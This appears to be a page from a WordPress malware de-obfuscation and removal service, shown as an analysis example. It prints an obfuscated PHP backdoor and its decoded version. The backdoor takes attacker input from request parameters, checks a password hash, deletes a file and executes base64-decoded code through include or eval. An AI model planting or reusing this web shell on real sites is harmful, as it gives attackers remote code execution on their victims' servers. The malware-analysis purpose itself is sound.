De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $bnlqr = array_merge($_GET, $_COOKIE, $_POST); $kfjbs = 'in_' . 'ar' . 'ray'; if ($bnlqr['m'] == '1') die('d3fa8bd72798457b3b865c6ee12c1e6c'); if (md5($bnlqr['ad975']) === 'd3fa8bd72798457b3b865c6ee12c1e6c') agvtc($bnlqr); function agvtc($lozgt) { $thxir = 'fi' . 'le_' . 'exi' . 'sts'; $rqrop = 'f' . 'op' . 'en'; $mhyau = 'f' . 'cl' . 'ose'; $iqwlb = 'u' . 'nl' . 'ink'; if ($thxir('./wp-sale.js')) { @$iqwlb('./wp-sale.js'); } $kzmne = 't' . 'mpf' . 'ile'; $cfyeu = 'fw' . 'rite'; $doyng = 'fs' . 'eek'; $amsaj = 'ba' . 'se' . chr(54) . chr(52) . chr(95) . chr(100) . chr(101) . chr(99) . 'o' . chr(100) . chr(101); $kfjbs = 'str' . 'ea' . 'm_' . 'get' . '_m' . 'eta' . '_' . 'data'; $nemqs = $kzmne(); if (fwrite($nemqs, chr(60) . chr(63) . chr(112) . chr(104) . chr(112) . chr(32) . $amsaj($lozgt['a287b'])) != false) { include($kfjbs($nemqs)['uri']); $mhyau($nemqs); } else { @eval($amsaj($lozgt['a287b'])); } }
<?php $bnlqr = array_merge($_GET, $_COOKIE, $_POST); $kfjbs = 'in_array'; if ($bnlqr['m'] == '1') { die('d3fa8bd72798457b3b865c6ee12c1e6c'); } if (md5($bnlqr['ad975']) === 'd3fa8bd72798457b3b865c6ee12c1e6c') { agvtc($bnlqr); } function agvtc($lozgt) { $thxir = 'file_exists'; $rqrop = 'fopen'; $mhyau = 'fclose'; $iqwlb = 'unlink'; if (file_exists('./wp-sale.js')) { @unlink('./wp-sale.js'); } $kzmne = 'tmpfile'; $cfyeu = 'fwrite'; $doyng = 'fseek'; $amsaj = "base64_decode"; $kfjbs = 'stream_get_meta_data'; $nemqs = tmpfile(); if (fwrite($nemqs, "<?php " . base64_decode($lozgt['a287b'])) != false) { include stream_get_meta_data($nemqs)['uri']; $mhyau($nemqs); } else { @eval(base64_decode($lozgt['a287b'])); } }
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.